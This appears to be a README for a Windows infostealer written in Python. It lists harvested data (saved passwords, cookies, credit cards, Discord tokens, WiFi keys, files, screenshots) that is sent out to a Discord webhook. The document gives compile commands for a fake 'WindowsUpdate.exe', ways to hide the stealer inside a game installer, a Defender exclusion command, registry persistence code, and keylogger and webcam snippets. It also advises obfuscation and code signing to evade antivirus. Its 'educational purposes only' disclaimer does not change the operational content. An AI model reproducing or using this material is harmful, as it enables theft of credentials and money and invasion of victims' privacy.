- stealer.py - Main data stealing script (500+ lines)
- compile.py - Auto-compiler to create EXE
- requirements.txt - Python dependencies
- ✅ Saved Passwords - All website logins
- ✅ Cookies - Session tokens, auth cookies
- ✅ Autofill Data - Names, addresses, emails
- ✅ Credit Cards - Card numbers & expiry dates
- ✅ Browsing History - Last 100 visited sites
- ✅ Bookmarks - Saved bookmarks
- ✅ Discord Tokens - All accounts (regular, PTB, Canary)
- ✅ User IDs - Extracted from tokens
- ✅ Multiple Sources - Desktop app + browser
- ✅ IP Address - Public & local IPs
- ✅ System Info - OS, RAM, CPU, disk usage
- ✅ MAC Address - Hardware identifier
- ✅ Network Interfaces - All network adapters
- ✅ Running Processes - Active applications
- ✅ WiFi Passwords - All saved networks
- ✅ SSID Names - Network names
- ✅ Desktop Files - .txt, .pdf, .doc, .png, .jpg
- ✅ Documents Folder
- ✅ Downloads Folder
- ✅ File Metadata - Size, modified date
- ✅ Screen Capture - Current screen state
# Step 1: Install Python dependencies
pip install pyinstaller pywin32 pycryptodome psutil pyautogui
# Step 2: Run auto-compiler
python compile.py
# Select option 3 (Full setup)This will create: dist/WindowsUpdate.exe
# Install requirements
pip install -r requirements.txt
# Compile to EXE
pyinstaller --onefile --noconsole --name=WindowsUpdate stealer.pypip install pywin32 pycryptodome psutil pyautogui
python stealer.pyAll stolen data is sent to Discord webhook in multiple embeds:
- System Information Embed - IP, OS, RAM, CPU, etc.
- Discord Tokens Embed - All found tokens
- Passwords Embed - Website credentials
- Credit Cards Embed - Card details
- Cookies Embed - Session cookies
- WiFi Passwords Embed - Network credentials
- Browser History Embed - Recent URLs
- Files Embed - Found documents
Edit stealer.py line 15:
WEBHOOK_URL = "YOUR_DISCORD_WEBHOOK_URL_HERE"WindowsUpdate.exe
ChromeUpdate.exe
SecurityPatch.exe
SystemOptimizer.exe# Create installer that includes your stealer
# User runs "game_installer.exe" which:
# 1. Installs the real game
# 2. Silently runs stealer in backgroundpyinstaller --icon=chrome.ico --noconsole stealer.pyAdd exclusion before running:
Add-MpPreference -ExclusionPath "C:\Users\<username>\Downloads"The script auto-creates temp directory and cleans up after
Runs once, sends data, and exits (no traces)
Add to stealer.py:
import winreg
def add_to_startup():
key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,
r"Software\Microsoft\Windows\CurrentVersion\Run",
0, winreg.KEY_SET_VALUE)
winreg.SetValueEx(key, "WindowsUpdate", 0, winreg.REG_SZ, sys.executable)
winreg.CloseKey(key)from pynput import keyboard
def on_press(key):
# Log keystrokes
pass
listener = keyboard.Listener(on_press=on_press)
listener.start()import cv2
cam = cv2.VideoCapture(0)
ret, frame = cam.read()
cv2.imwrite('webcam.jpg', frame)- ✅ Google Chrome
- ✅ Microsoft Edge
- ✅ Opera
- ✅ Brave
- ✅ Chromium-based browsers
pywin32- Windows API accesspycryptodome- Decrypt Chrome datapsutil- System informationpyautogui- Screenshots
This stealer only works on Windows (uses Win32 APIs)
THIS IS FOR EDUCATIONAL PURPOSES ONLY
Using this tool without explicit permission is:
- ❌ Illegal in most countries
- ❌ Violates Computer Fraud & Abuse Act (USA)
- ❌ Violates GDPR (Europe)
- ❌ Can result in criminal prosecution
- ❌ Can result in civil lawsuits
✅ Testing your own computer ✅ Penetration testing with written authorization ✅ Security research in controlled environment ✅ Educational demonstrations with dummy data
❌ Installing on someone else's computer ❌ Distributing without disclosure ❌ Using stolen data ❌ Selling the tool ❌ Harassment or blackmail
pip install --upgrade pywin32 pycryptodome psutil pyautoguiRun as Administrator or add exclusions to antivirus
- Check webhook URL is correct
- Ensure internet connection active
- Check Discord webhook limits (30 requests/minute)
- Use obfuscator: PyArmor
- Add legitimate icon and metadata
- Code sign the executable
- Added credit card extraction
- Added WiFi password stealing
- Added screenshot capture
- Added file search
- Improved Discord token extraction
- Better error handling
- Basic Chrome password extraction
- Discord token stealing
- System information collection
For educational questions only.
Remember: With great power comes great responsibility.
Use wisely. Use legally. Use ethically.